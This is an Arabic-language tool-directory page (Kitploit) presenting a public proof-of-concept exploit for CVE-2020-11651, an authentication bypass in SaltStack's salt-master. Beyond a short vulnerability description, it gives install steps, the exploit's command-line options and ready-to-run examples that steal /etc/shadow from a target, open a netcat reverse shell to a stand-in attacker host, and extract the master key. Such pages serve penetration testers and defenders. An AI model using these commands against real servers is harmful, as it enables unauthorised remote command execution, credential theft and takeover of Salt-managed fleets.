Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-11651 — CVE-2020-11651: إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/0xc0d/cve-2020-11651
تحليل الثغرات الأمنيةالاستغلالتسريب البياناتاختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: إثبات المفهوم

عرض المستودع
40142منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2020-11651

تم اكتشاف مشكلة في SaltStack Salt قبل الإصدار 2019.2.4 وقبل 3000.2. لا تتحقق فئة ClearFuncs في عملية salt-master من صحة استدعاءات الطرق بشكل صحيح. وهذا يسمح لمستخدم عن بُعد بالوصول إلى بعض الطرق دون مصادقة. يمكن استخدام هذه الطرق لاسترجاع رموز المستخدمين من خادم salt الرئيسي و/أو تنفيذ أوامر عشوائية على عمال salt.

تفاصيل

تصحيحات لإصدارات salt غير المدعومة

التثبيت

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

الاستخدام

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        الأمر المراد تنفيذه. الافتراضي: /bin/sh (استخدم netcat للشل العكسي)
  --upload src dest, -u src dest
                        رفع ملف
  --download src dest, -d src dest
                        تنزيل ملف
  --minions             إرسال الأمر إلى جميع العمال على الخادم الرئيسي
  --quiet, -q           تفعيل الوضع الصامت/الهادئ
  --fetch-key-only      جلب المفتاح فقط

مثال

تنزيل ملف shadow

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

تشغيل شل عكسي

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

جلب المفتاح

root@kitploit:~
./PoC.py --host target.com --fetch-key-only
تنزيل الأداة